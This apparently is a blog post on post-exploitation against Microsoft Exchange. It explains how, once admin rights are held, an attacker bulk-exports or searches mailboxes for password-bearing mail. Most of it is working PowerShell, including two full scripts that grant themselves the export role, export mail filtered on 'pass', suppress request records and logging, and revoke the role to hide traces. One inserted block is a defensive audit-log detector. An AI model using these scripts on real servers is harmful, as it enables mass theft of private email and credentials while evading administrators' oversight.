Exchange email export methods


Introduction

This article assumes that administrative rights on the Exchange server have already been obtained. The next step is to search and export the emails on the server in order to obtain more critical and sensitive information, such as passwords and personal information.

Basic information acquisition

Get the target account

Get-MailboxStatistics -Identity yangsir |fl

Management

PSSession

$User = "rootkit.org\administrator"
$Pass = ConvertTo-SecureString -AsPlainText 'admin!@#45' -Force
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://OWA2013/PowerShell/ -Authentication Kerberos -Credential $Credential
Import-PSSession $Session -AllowClobber

The connection URI must use the server's FQDN; if it is not an FQDN, the connection fails with an error.

Get PSSession information:
Get-PSSession

Remove the PSSession:
Remove-PSSession $Session

Get the mailbox accounts:
Get-Mailbox

Use exchange

Add the Exchange management snap-in:
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;

MSDN info

https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps

Get all accounts

Get information on all mailboxes, including the number of messages and the last time each mailbox was accessed

Get all OUs

Get-OrganizationalUnit

Get the message tracking log

Default directory:
%ExchangeInstallPath%TransportRoles\Logs\MessageTracking

Get the messages sent by a specified sender

Show information about all emails sent by yangsir@rootkit.org from 18:00, 28 July 2021 to the present

Get-MessageTrackingLog -Start "07/28/2019 18:00:00" -Sender "yangsir@rootkit.org"

The output is the same as in the example.

Get more concise information

Get-MessageTrackingLog -EventID send -Start "07/28/2019 18:00:00" -Sender "yangsir@rootkit.org"

Export

PSSession

A PSSession connection is required first.

Add the current user to the Mailbox Import Export role group

Export a specific user

$User = "yangsir"
New-MailboxexportRequest -mailbox $User -FilePath ("\\localhost\c$\daochu\"+$User+".pst")

This exports the mailbox to the daochu directory.

Export emails that contain a keyword

$User = "yangsir"
New-MailboxexportRequest -mailbox $User -ContentFilter {(body -like "*pass*")} -FilePath ("\\localhost\c$\daochu1\"+$User+".pst")

Export all emails

Get-Mailbox -OrganizationalUnit Users -Resultsize unlimited |%{New-MailboxexportRequest -mailbox $_.name -FilePath ("\\localhost\c$\all\"+($_.name)+".pst")}

Export log

Get the log

This way no log is kept

Delete all logs

PS AUTO

The following script is from 3gstudent:

function UsePSSessionToExportMailfromExchange
{
#Requires -Version 2.0
<#
.SYNOPSIS
This script will export the mail(.pst) from the Exchange server.
First it will use PSSession to connect the Exchange server.
Then it'll check the user's privilege.
If the user is not in the "Mailbox Import Export",the script will add the user to it and reconnect the Exchange server.
Next it will export the mail and save it.
At last it will remove the user from the group and remove the PSSession.
Author: 3gstudent
.PARAMETER User
The user to use.
In general, you can choose the account in the domain admins.
.PARAMETER Password
The password of the user.
.PARAMETER MailBox
The mail you want to export.
.PARAMETER ExportPath
The export path of the mail.
.PARAMETER ConnectionUri
The uri of the Exchange server.
Eg.
    http://Exchange01.test.com/PowerShell/
    
.PARAMETER Filter
The search filter of the mail.
.EXAMPLE
PS C:\> UsePSSessionToExportMailfromExchange -User "administrator" -Password "DomainAdmin123!" -MailBox "test1" -ExportPath "\\Exchange01.test.com\c$\test\" -ConnectionUri "http://Exchange01.test.com/PowerShell/" -Filter "{`"(body -like `"*pass*`")`"}"
#>
 	param (
        [Parameter(Mandatory = $True)]
		[string]$User,
        [Parameter(Mandatory = $True)]
		[string]$Password,
        [Parameter(Mandatory = $True)]
		[string]$MailBox,
        [Parameter(Mandatory = $True)]
		[string]$ExportPath,
        [Parameter(Mandatory = $True)]
		[string]$ConnectionUri,
        [Parameter(Mandatory = $True)]
		[string]$Filter
	)
    $Flag = 0
    Write-Host "[>] Start to Import-PSSession" 
    #Import-PSSession
    $Pass = ConvertTo-SecureString -AsPlainText $Password -Force
    $Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
    $Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri $ConnectionUri -Authentication Kerberos -Credential $Credential
    Import-PSSession $Session -AllowClobber| Out-Null

    Write-Host "[>] Start to check user"
    #check user
    if(Get-ManagementRoleAssignment ("Mailbox Import Export-"+$User) -ErrorAction SilentlyContinue) 
    {
    	Write-Host "[!] The specified user already exists.No need to add it to the group"
	$Flag = 1
    }
    else
    {
    	Write-Host "[+] Start to add user" 
    	#Add user
    	New-ManagementRoleAssignment -Role "Mailbox Import Export" -User $User| Out-Null
    	Write-Host "[>] Start to reconnect"
    	#Reconnect
    	Remove-PSSession $Session
    	$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri $ConnectionUri -Authentication Kerberos -Credential $Credential
    	Import-PSSession $Session -AllowClobber| Out-Null
    }
    Write-Host "[+] Start to export mail" 
    #Export mail and do not save the export request
    New-MailboxexportRequest -mailbox $MailBox -ContentFilter $Filter -FilePath ($ExportPath+$MailBox+".pst") -CompletedRequestAgeLimit 0
    
    #Compare with -eq; "=" would assign 0 and the block would never run
    if ($Flag -eq 0)
    {
    	Write-Host "[>] Start to remove user"
    	#Remove user
    	Get-ManagementRoleAssignment ("Mailbox Import Export-"+$User) |Remove-ManagementRoleAssignment -Confirm:$false
    }
    
    Write-Host "[>] Start to Remove-PSSession"
    #Remove PSSession
    Remove-PSSession $Session
    Write-Host "[+] All done."
}
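
Seen from the defender's side, when admin audit logging is enabled the script above leaves a recognizable sequence: a "Mailbox Import Export" role assignment, an export request, then removal of the assignment, all by the same caller. The block below is an added example (not from the original post or from 3gstudent) that correlates that sequence; the function names, the 60-minute window and the sample entries are constructed for illustration, and the entry shape is assumed to match Search-AdminAuditLog output.

```powershell
# Added example. Entries are assumed to have the shape of Search-AdminAuditLog
# results: RunDate, Caller, CmdletName, ObjectModified, CmdletParameters.
function Get-AuditParam($Entry, [string]$Name) {
    ($Entry.CmdletParameters | Where-Object { $_.Name -eq $Name }).Value
}

function Find-MailboxExportActivity {
    param([Parameter(Mandatory = $true)][object[]]$Entries,
          [int]$WindowMinutes = 60)   # correlation window, an assumed value
    $role = 'Mailbox Import Export'
    foreach ($exp in $Entries | Where-Object { $_.CmdletName -eq 'New-MailboxExportRequest' }) {
        # Audited actions by the same caller close in time to this export
        $near = $Entries | Where-Object {
            $_.Caller -eq $exp.Caller -and
            [math]::Abs(($_.RunDate - $exp.RunDate).TotalMinutes) -le $WindowMinutes }
        $granted = $near | Where-Object {
            $_.CmdletName -eq 'New-ManagementRoleAssignment' -and
            $_.RunDate -le $exp.RunDate -and (Get-AuditParam $_ 'Role') -eq $role }
        $revoked = $near | Where-Object {
            $_.CmdletName -eq 'Remove-ManagementRoleAssignment' -and
            $_.RunDate -ge $exp.RunDate -and $_.ObjectModified -like "$role*" }
        [pscustomobject]@{
            RunDate       = $exp.RunDate
            Caller        = $exp.Caller
            Mailbox       = Get-AuditParam $exp 'Mailbox'
            FilePath      = Get-AuditParam $exp 'FilePath'
            ContentFilter = Get-AuditParam $exp 'ContentFilter'
            AgeLimit      = Get-AuditParam $exp 'CompletedRequestAgeLimit'
            # True when the role was granted before and revoked after the export
            TemporaryRole = [bool]$granted -and [bool]$revoked
        }
    }
}

# Constructed sample entries (not real log data)
function New-SampleEntry($Time, $Cmdlet, $Object, [hashtable]$Params) {
    [pscustomobject]@{
        RunDate = [datetime]$Time; Caller = 'rootkit.org/Users/administrator'
        CmdletName = $Cmdlet; ObjectModified = $Object
        CmdletParameters = $Params.GetEnumerator() |
            ForEach-Object { [pscustomobject]@{ Name = $_.Key; Value = $_.Value } }
    }
}
$sample = @(
    (New-SampleEntry '2021-07-28 18:00:05' 'New-ManagementRoleAssignment' 'Mailbox Import Export-administrator' @{ Role = 'Mailbox Import Export'; User = 'administrator' }),
    (New-SampleEntry '2021-07-28 18:00:40' 'New-MailboxExportRequest' 'yangsir' @{ Mailbox = 'yangsir'; ContentFilter = '(body -like "*pass*")'; FilePath = '\\localhost\c$\daochu1\yangsir.pst'; CompletedRequestAgeLimit = '0' }),
    (New-SampleEntry '2021-07-28 18:03:10' 'Remove-ManagementRoleAssignment' 'Mailbox Import Export-administrator' @{ Identity = 'Mailbox Import Export-administrator' })
)
Find-MailboxExportActivity -Entries $sample | Format-List
```

On a live server, the Entries argument can be the output of Search-AdminAuditLog -Cmdlets New-ManagementRoleAssignment,New-MailboxExportRequest,Remove-ManagementRoleAssignment for the period under review. An export to an administrative share with a keyword content filter and TemporaryRole set to True is the pattern to review first.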

Use exchange

Export a specific user

Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;
$User = "yangsir"
New-MailboxexportRequest -mailbox $User -FilePath ("\\localhost\c$\daochu\"+$User+".pst")

PS AUTO

As above, this script is from 3gstudent:

function DirectExportMailfromExchange
{
#Requires -Version 2.0
<#
.SYNOPSIS
This script will export the mail(.pst) from the Exchange server.
The script needs to be executed on the Exchange server.

Author: 3gstudent

.PARAMETER MailBox
The mail you want to export.

.PARAMETER ExportPath
The export path of the mail.
 
.PARAMETER Filter
The search filter of the mail.

.PARAMETER Version
The version of the Exchange.
It can be 2007,2010,2013 and 2016.

.EXAMPLE
PS C:\> DirectExportMailfromExchange -MailBox "test1" -ExportPath "\\localhost\c$\test\" -Filter "{`"(body -like `"*pass*`")`"}" -Version 2013
#>
 	param (
        [Parameter(Mandatory = $True)]
		[string]$MailBox,
        [Parameter(Mandatory = $True)]
		[string]$ExportPath,
        [Parameter(Mandatory = $True)]
		[string]$Filter,
        [Parameter(Mandatory = $True)]
		[string]$Version
	)

    Write-Host "[>] Start to add PSSnapin" 
    if ($Version -eq 2007)
    {
        Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;
    }

    elseif ($Version -eq 2010)
    {
        Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;
    }

    else
    {
        
        Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;
    }
  
    Write-Host "[+] Start to export mail" 
    #Export mail and do not save the export request
    #Note: the content filter is hard-coded below; the Filter parameter is not used
    New-MailboxexportRequest -mailbox $MailBox -ContentFilter {(body -like "*pass*")} -FilePath ($ExportPath+$MailBox+".pst") -CompletedRequestAgeLimit 0
    Write-Host "[+] All done."
}

PSSession

Export in the same way as above.

Use exchange

Search all target mailboxes for the keyword:
Get-Mailbox|Search-Mailbox -SearchQuery "*pass*" -EstimateResultOnly

Search all target mailboxes for the keyword and copy the results to a folder in the specified user's mailbox:
Get-Mailbox|Search-Mailbox -SearchQuery "*pass*" -TargetMailbox "user" -TargetFolder "out" -LogLevel Suppress

Search one target user's mailbox for the keyword and copy the results to a folder in the specified user's mailbox:
Search-Mailbox -Identity yangsir -SearchQuery "*pass*" -TargetMailbox "user" -TargetFolder "out" -LogLevel Suppress

ECP

Add the target user to the Discovery Management group

Then go to this module


Author: Yangsir
Reprint policy: All articles in this blog are licensed under CC BY 4.0 unless otherwise stated. If reproduced, please credit the source, Yangsir.